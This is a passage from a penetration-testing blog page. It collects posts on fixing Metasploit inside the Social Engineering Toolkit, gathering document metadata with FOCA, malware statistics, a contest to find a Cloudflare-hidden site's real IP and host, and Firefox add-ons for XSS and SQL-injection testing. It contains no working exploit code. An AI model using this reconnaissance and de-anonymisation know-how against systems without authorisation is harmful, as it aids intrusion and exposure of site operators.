<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">If you installed metasploit from git repository then you donot face any problem with SET. But If you have installed metasploit from its binary version then when you tried to running social engineering toolkit metasploit attack then might be you get error of some ruby bundle. Here is solution of that problem. I tested on SET <b>Version: 5.2.1</b> & metasploit <b>v4.6.2-1</b>.</span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">We are going to install Ruby 1.9.3 using RVM. Running all this command in msf3 folder</span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;">root@bt:~# <b>cd /opt/metasploit/apps/pro/msf3/</b></div><div style="margin-bottom: 0in;"><br /><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">root@bt:/opt/metasploit/apps/pro/msf3# <b>bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) </b></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;"><b> </b></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">root@bt:/opt/metasploit/apps/pro/msf3# <b>source /etc/profile.d/rvm.sh</b></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;"><b> </b></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">root@bt:/opt/metasploit/apps/pro/msf3# <b>rvm -v </b></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">Once RVM is up and running we need to get a couple of libraries that will be required by the Ruby installation: </span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">root@bt:/opt/metasploit/apps/pro/msf3# <b>for package in zlib openssl libxslt libxml2; do rvm pkg install $package; done </b></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;"></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">And finally the Ruby 1.9.3 runtime: </span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">root@bt:/opt/metasploit/apps/pro/msf3# <b>rvm install 1.9.3</b></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">root@bt:/opt/metasploit/apps/pro/msf3# <b>rvm 1.9.3 --default</b></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">root@bt:/opt/metasploit/apps/pro/msf3# <b>ruby -v</b></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">root@bt:/opt/metasploit/apps/pro/msf3# <b>gem install bundler </b></span></span></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">root@bt:/opt/metasploit/apps/pro/msf3# <b>bundle install </b></span></span></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">Now open set from its path ; before running set type command like below</span></span></div><div style="margin-bottom: 0in;"><b><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">cd /pentest/exploits/set </span></span></b></div><b></b><br /><div style="margin-bottom: 0in;"><b><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">source /etc/profile.d/rvm.sh </span></span></b></div><b></b><br /><div style="margin-bottom: 0in;"><b><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">rvm 1.9.3 –default </span></span></b></div><b></b><br /><div style="margin-bottom: 0in;"><b><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">./se-toolkit </span></span></b></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-family: Times New Roman, serif;"><span style="font-size: medium;">Now you can use any metasploit attack from SET .</span></span></div><a name='more'></a><br /></div>

How to solve metasploit problem in SET?

If you installed metasploit from git repository then you donot face any problem with SET. But If you have installed metasploit from its bina...

+ Read more »

Information Gathering Using FOCA

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="Default"><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">Last month I put some of tutorial on Information gathering which is first step of penetration testing  , & today we will go ahead in this series . As you know Backtrack has all tools for penetration testing , but this tool is not come with backtrack ; It`s very powerful  tool for information gathering and its name is FOCA (Fingerprinting Organizations with Collected Ar­chieves). It is windows based  tool ; you can install it in linux with help of wine. But i used it in windows  , you can find here “<a href="http://hackonadime.blogspot.in/2011/04/7-installing-foca-in-wine-on-backtrack.html" target="_blank">how to install foca inbacktrack?</a>”<o:p></o:p></span></div><div class="Default"><br /></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><br /></div><div class="Default"><span style="color: windowtext; font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">What kind of data can be found?</span><span style="font-size: 14pt;"> </span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><br /></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">•Metadata: <o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">–Information stored to give information about the document. <o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">•For example: Creator, Organization, etc.. <o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">•Hidden information: <o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">–Information internally stored by programs and not editable. <o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">•For example: Template paths, Printers, db structure, etc… <o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">•Lost data: <o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">–Information which is in documents due to human mistakes or negligence, because it was not intended to be there. <o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">•For example: Links to internal servers, data hidden by format, etc… <o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><br /></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">Download:-<o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><br /></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">(1)Go to official website <a href="http://www.informatica64.com/foca.aspx%E2%80%8E" target="_blank">here</a>.<o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">(2)Enter your valid email address at end of page & you will receive email which contain Download link.<o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">(3)Install Foca by running setup.<o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><br /></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">Sample Example of FOCA:-<o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;"><br /></span></div><div class="Default"> </div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">(1)Open foca click on create new project.<o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">(2)Enter project name & domain name & click on create.<o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsE38rLtxSD7lx0Q3vhrjKatsoC9pgQsag4FQpvrafDEnGmBNAZaqUpKC1x2sAj0gnH4Se0_2DUI2WWh5ZctDYc8t8vHD-ge-OvZuVkKZFZDd6Ikl6bfITiHjAgeGRTvtkjxX0yJQBPIOj/s1600/foca-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsE38rLtxSD7lx0Q3vhrjKatsoC9pgQsag4FQpvrafDEnGmBNAZaqUpKC1x2sAj0gnH4Se0_2DUI2WWh5ZctDYc8t8vHD-ge-OvZuVkKZFZDd6Ikl6bfITiHjAgeGRTvtkjxX0yJQBPIOj/s400/foca-1.png" width="400" /></a></div><br /><div class="MsoNormal" style="margin-bottom: 0.0001pt;"> </div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">(3)On right side you can see different file types which will be searching in given domain. Select which file type you want to search &  click on search.<o:p></o:p></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIVoRz_rtkKvCO77ou2B0yJl5WHpZbcbPa8GPrEcqpRFAi8cNya2xE1YuBc88vLxGJ7Yi-FkgTUTOUNK6Gg2fSAiN5kL-CC6EEJg6hnSc_EG8Y2n5AFzW8u_PboqYjZ13X9TQJgsVwqImO/s1600/foca-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIVoRz_rtkKvCO77ou2B0yJl5WHpZbcbPa8GPrEcqpRFAi8cNya2xE1YuBc88vLxGJ7Yi-FkgTUTOUNK6Gg2fSAiN5kL-CC6EEJg6hnSc_EG8Y2n5AFzW8u_PboqYjZ13X9TQJgsVwqImO/s400/foca-2.png" width="400" /></a></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">(4)As you can see in above image ; it will find different files from domain using google & bing search engine.<o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><br /></div><a name='more'></a><br /><div class="MsoNormal" style="margin-bottom: 0.0001pt;"> </div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">(5)Then right click on file & download it &then again right click on file & extract metadata from file.<o:p></o:p></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8_71WCwZoQOBc44RWs_QB3tDjEHPBDbObfYyUH8NU5xF0pJXs-Z8D72w0LTE2KjlwaI4r77oW0Mi897FiQ0fqR4LWqy29T7-keFGHKvqCKchXZAycQuz-pI-f_EhSDUD13XgG84yFKvnS/s1600/foca-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8_71WCwZoQOBc44RWs_QB3tDjEHPBDbObfYyUH8NU5xF0pJXs-Z8D72w0LTE2KjlwaI4r77oW0Mi897FiQ0fqR4LWqy29T7-keFGHKvqCKchXZAycQuz-pI-f_EhSDUD13XgG84yFKvnS/s400/foca-3.png" width="400" /></a></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;"><br /></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">(6)On left side click on metadata summary ;there you can find different information which are extracted from document like username ;software; creation date ;modification date.<o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"> </div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;">It can also find different DNS of related domain & server details.<o:p></o:p></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDgfbuH98QIWOzjxOq6HmlwwgH6BNKbuMZ7d-0WDkreQSHO5jOyekMjWL9Iv3Xbdk2QcANrK3xRY6KgfvmIlo2Cx52vw_N_v5hhE4GQ-E1abDSKtOGjEu1RW3y26z4hS6iBfjpa1dCWNFu/s1600/foca-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDgfbuH98QIWOzjxOq6HmlwwgH6BNKbuMZ7d-0WDkreQSHO5jOyekMjWL9Iv3Xbdk2QcANrK3xRY6KgfvmIlo2Cx52vw_N_v5hhE4GQ-E1abDSKtOGjEu1RW3y26z4hS6iBfjpa1dCWNFu/s400/foca-4.png" width="400" /></a></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;"><br /></span></div><div class="Default"><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">(7)It can also find some juicy info ; known vulnerability; backup; directory listing ; sqli ; svn; GHDB and much more.<o:p></o:p></span></div><div class="Default"><br /></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"> </div><div class="Default"><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">It`s just simple tutorial.So download it & enjoy it & gather some critical information. </span><span style="font-family: Wingdings; font-size: 14.0pt; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-char-type: symbol; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin; mso-symbol-font-family: Wingdings;">J</span><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"><o:p></o:p></span></div><div class="MsoNormal" style="margin-bottom: 0.0001pt;"><span style="font-size: 14.0pt; mso-bidi-font-family: Calibri; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin;"><br /></span></div></div>

Information Gathering Using FOCA

Last month I put some of tutorial on Information gathering which is first step of penetration testing  , & today we will go ahead in thi...

+ Read more »

Malware Not To Decrease Any Time Soon!

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGJ2ic0ak9cAgEruW2Z5d2SfCRyMeXdEEAyfXIkiYgdo3aPiRJL4t2PWgjhpkC3ShlDsXcBC250VuMKyZ26AnJ7SBJfgfLa9FlcrK6-PqFAyd5tIqGmOjRhb09iYsDakso3lV_1QXu0yk/s1600/Google_Safe_Browsing_Flags_Websites_with_Malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGJ2ic0ak9cAgEruW2Z5d2SfCRyMeXdEEAyfXIkiYgdo3aPiRJL4t2PWgjhpkC3ShlDsXcBC250VuMKyZ26AnJ7SBJfgfLa9FlcrK6-PqFAyd5tIqGmOjRhb09iYsDakso3lV_1QXu0yk/s640/Google_Safe_Browsing_Flags_Websites_with_Malware.png" width="577" /></a></div><br />There are now more than 1 billion smartphone users around the world, many of whom are connected to always-live cloud services. While e-mail and social media accounts are synced with their PC counterparts to create a seamless solution for cross-platform communication, we are now beginning to see some of the major security issues that have been created.<br /><a name='more'></a>Malware, software intended to damage or take control of a computer system, is spreading through these open channels causing infections at alarming rates. In 2012, mobile malware increased by <b>1200%</b> and <u>32% of desktop computers were identified as being infected</u> with a trojan, worm or virus. Many of these infections can be avoided by using a freeware software solution such as <u>Spybot</u>, although new types of malware are released daily that can avoid immediate detection. In the following infographic some incredible statistics have been compiled into a guide explaining the process of infection, the information at stake and helpful tips on protecting yourself from a technological and potentially identity-stealing disaster.<br /><a href="http://www.lifelock.com/education/articles/images/malware-infographic.jpg" target="_blank"><img alt="Malware Infographic" src="http://www.lifelock.com/education/articles/images/malware-infographic.jpg" style="height: 1754px; width: 550px;" /></a></div>

Malware Not To Decrease Any Time Soon!

There are now more than 1 billion smartphone users around the world, many of whom are connected to always-live cloud services. While e-mail ...

+ Read more »

Win A Free Shot At "Samurai Skills" Penetration Testing Course

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOnF0U_2F_aR5_Ls-ZfXLwLSq1r6W9FijXOXnGAH89bW6qoC-AHFoF_s4JHmzhBVAoRyFw7IplRsQ0pmxneCgaj-uSJnTnM9h3XVzHdHjHzYY5DD2UfJxDTxrtJkO3cuDgCWoP1X75Snk/s1600/image0041170674785895.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOnF0U_2F_aR5_Ls-ZfXLwLSq1r6W9FijXOXnGAH89bW6qoC-AHFoF_s4JHmzhBVAoRyFw7IplRsQ0pmxneCgaj-uSJnTnM9h3XVzHdHjHzYY5DD2UfJxDTxrtJkO3cuDgCWoP1X75Snk/s400/image0041170674785895.gif" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><u><b><i>Update: Winners Announced <a href="http://www.rafayhackingarticles.net/2013/07/bypassing-cloudfare-attack-secure.html" target="_blank">here </a></i></b></u></div><span id="goog_1567433507"></span><span id="goog_1567433508"></span><br />Well, You might have already about "<a href="http://www.rafayhackingarticles.net/2012/04/penetration-testing-in-real-world.html" rel="nofollow" target="_blank"><b>Attack-Secure Real World Penetration testing course</b></a>", The course is based upon real world Penetration testing, The course covers almost every thing that you need to learn in order to become a good Penetration tester. The lab is based upon over 20+ real world targets that you need to hack and find the key.txt file in order to pass the examination.<br /><a name='more'></a>Luckily for <a href="http://rafayhackingarticles.net/" target="_blank"><b>RHA readers</b></a>, the Attack-secure founder "<b>Muhammad Ramadan</b>" was kind enough to to sponsor a contest for us. The contest is based upon a challenge where the first one to solve it would get a <b><u>free chance at the certification and full access to the lab</u></b>. The others would get amazing <b><u>20% discount</u></b> on all courses.<br /><br />The challenge goes as follows:<br /><br />The website attack-secure.com is running cloudflare, Therefore the real IP and the hosting provider is not known, We verified it by performing a query to it's dns servers.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilcqX38sM6z_HdJyYoWzb66HAFHuSomXMVsZ2-Dbd6TP7z6eUbLetzdokgttlg9F-8rXo1DjBU5Ym9iVEpPZfHwifd2PS_q7MTQJqEy22Ed9F7KXu8YfSqQA5gzGPz3DHk5jiWj45rnsQ/s1600/ss.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilcqX38sM6z_HdJyYoWzb66HAFHuSomXMVsZ2-Dbd6TP7z6eUbLetzdokgttlg9F-8rXo1DjBU5Ym9iVEpPZfHwifd2PS_q7MTQJqEy22Ed9F7KXu8YfSqQA5gzGPz3DHk5jiWj45rnsQ/s1600/ss.png" /></a></div><br />Your challenge is as follows:<br /><br /><b>1) </b><u>Find the Hosting Provider of Attack-secure.com</u><br /><b>2) </b><u>Find the real dns servers</u>.<br /><b>3) </b><u>Find the real IP <b>(Additional Points)</b></u><br /><br />Wish you good luck, You can report answers to <b><u>rafayhackingarticles@gmail.com</u></b>.</div>

Win A Free Shot At "Samurai Skills" Penetration Testing Course

Update: Winners Announced here  Well, You might have already about " Attack-Secure Real World Penetration testing course ", The co...

+ Read more »

Firefox Add-ons for penetration testers

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div style="font-weight: normal; margin-bottom: 0in;"><span style="font-size: medium;">In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary from information gathering tools to attacking tools. If you are using BACKTRACK than use OWASP Mantra which has lots of useful Add-ons.</span></div><div style="font-weight: normal; margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;"><b>(1)</b></span><b><span style="font-size: medium;"><b>Firebug</b></span></b><b><span style="font-size: medium;"><span style="font-weight: normal;"><br /></span></span></b><span style="font-size: medium;"><span style="font-weight: normal;">Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s an really helpful add-on in finding DOM based XSS for security testing professionals.Add </span></span><i><span style="font-size: medium;"><span style="font-weight: normal;">Firebug</span></span></i><span style="font-size: medium;"><span style="font-weight: normal;">in your Browser from this link: <a href="https://addons.mozilla.org/en-US/firefox/addon/firebug/">https://addons.mozilla.org/en-US/firefox/addon/firebug/</a></span></span></div><div style="font-weight: normal; margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><span style="font-size: medium;"><b>(2)</b></span><b><span style="font-size: medium;"><b>Web Developer</b></span></b><b><span style="font-size: medium;"><span style="font-weight: normal;"><br /></span></span></b><span style="font-size: medium;"><span style="font-weight: normal;">Web Developer is another nice add-on that adds various web development tools in the browser. It helps in web application penetration testing.Add </span></span><i><span style="font-size: medium;"><span style="font-weight: normal;">Web Developer</span></span></i><span style="font-size: medium;"><span style="font-weight: normal;">in your browser from this link: <a href="https://addons.mozilla.org/de/firefox/addon/web-developer/">https://addons.mozilla.org/de/firefox/addon/web-developer/</a></span></span><b><span style="font-size: medium;"><span style="font-weight: normal;"></span></span></b><br /><b><span style="font-size: medium;"><span style="font-weight: normal;"><br /></span></span></b><b><span style="font-size: medium;"><b>(3)Live HTTP Headers</b></span></b><b><span style="font-size: medium;"><span style="font-weight: normal;"><br />Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each http request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any kind of need to tell how important this add-on is for the security testing process.Add </span></span></b><i><span style="font-size: medium;"><span style="font-weight: normal;">Live HTTP Headers</span></span></i><b><span style="font-size: medium;"><span style="font-weight: normal;">to Firefox with this link: <a href="https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/">https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/</a></span></span></b></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><b><span style="font-size: medium;"><b>(4)Tamper Data</b></span></b><b><span style="font-size: medium;"><span style="font-weight: normal;"><br />Tamper Data is similar to the Live HTTP Header add-on but, has header editing capabilities. With the tamper data add-on, you can view and modify HTTP/HTTPS headers and post parameters. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XSS and SQL Injection attacks by modifying header data.Add the </span></span></b><i><span style="font-size: medium;"><span style="font-weight: normal;">Tamper data</span></span></i><b><span style="font-size: medium;"><span style="font-weight: normal;">add-on to Firefox browser with this link: <a href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/">https://addons.mozilla.org/en-US/firefox/addon/tamper-data/</a>)</span></span></b></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><b><span style="font-size: medium;"><b>(5)Hackbar</b></span></b><b><span style="font-size: medium;"><span style="font-weight: normal;"><br />Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the times, this tool helps in testing XSS vulnerability with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.I am sure, most of the persons in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability of manually sending POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to the XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on Firefox browser.Add </span></span></b><i><span style="font-size: medium;"><span style="font-weight: normal;">Hackbar</span></span></i><b><span style="font-size: medium;"><span style="font-weight: normal;">add-on to Firefox browser with this link: <a href="https://addons.mozilla.org/en-US/firefox/addon/hackbar/">https://addons.mozilla.org/en-US/firefox/addon/hackbar/</a>  </span></span></b></div><div style="margin-bottom: 0in;"></div><a name='more'></a><br /><br /><div style="margin-bottom: 0in;"><b><span style="font-size: medium;"><b>(6)Websecurify</b></span></b><b><span style="font-size: medium;"><span style="font-weight: normal;"><br /></span></span></b><span style="font-size: medium;"><span style="font-weight: normal;">Websecurify is a nice penetration testing tool that is also available as add-on for Firefox. We have already covered WebSecurify in detail in previous article. WebSecurify can detect most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerability. Unlike other listed tools, it is a complete penetration testing tool in itself available as a browser add-on. It gives most of the features available in standalone tool.Add </span></span><i><span style="font-size: medium;"><span style="font-weight: normal;">WebSecurify</span></span></i><span style="font-size: medium;"><span style="font-weight: normal;">to Firefox browser with this link: <a href="https://addons.mozilla.org/en-us/firefox/addon/websecurify/">https://addons.mozilla.org/en-us/firefox/addon/websecurify/</a></span></span><b><span style="font-size: medium;"><span style="font-weight: normal;"></span></span></b><br /><b><span style="font-size: medium;"><span style="font-weight: normal;"><br /></span></span></b><b><span style="font-size: medium;"><b>(7)XSS Me</b></span></b><b><span style="font-size: medium;"><br /></span></b><b><span style="font-size: medium;"><span style="font-weight: normal;">Cross Site Scripting is the most found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that renders a payload on the page, and may be vulnerable to XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.Add </span></span></b><i><span style="font-size: medium;">XSS Me</span></i><b><span style="font-size: medium;"><br /></span></b><b><span style="font-size: medium;"><span style="font-weight: normal;">to your Firefox browser: <a href="https://addons.mozilla.org/en-us/firefox/addon/xss-me/">https://addons.mozilla.org/en-us/firefox/addon/xss-me/</a></span></span></b></div><div style="margin-bottom: 0in;"><br /></div><div style="margin-bottom: 0in;"><b><span style="font-size: medium;"><b>(8)SQL Inject Me</b></span></b><b><span style="font-size: medium;"><br /></span></b><span style="font-size: medium;">SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but display that it exists. SQL injection is one of the most harmful web application vulnerabilities, it can allow attackers to view, modify, edit, add or delete records in a database.The tool sends escape strings through form fields, and tries to search database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this 